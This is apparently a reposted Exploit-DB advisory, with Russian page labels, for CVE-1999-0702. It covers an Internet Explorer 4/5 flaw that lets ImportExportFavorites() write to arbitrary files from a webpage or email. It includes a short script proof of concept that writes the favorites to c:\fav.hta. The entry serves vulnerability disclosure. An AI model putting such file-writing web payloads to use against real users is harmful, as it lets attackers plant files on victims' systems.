- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19490
- Проверка EDB
-
- Пройдено
- Автор
- GEORGI GUNINSKI
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-1999-0702
- Дата публикации
- 1999-09-10
Microsoft Internet Explorer 4.0.1/5 - Import/Export Favorites
Код:
Microsoft Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0,Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4 Import/Export Favorites Vulnerability
source: https://www.securityfocus.com/bid/627/info
The ImportExportFavorites() method, used to import and export favorites to/from a file in IE5, can be made to write to any file on the system, in some cases from an email or remote webpage.
This will create a file in the root of C: containing the user's favorites.
<SCRIPT>
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>- Источник
- www.exploit-db.com
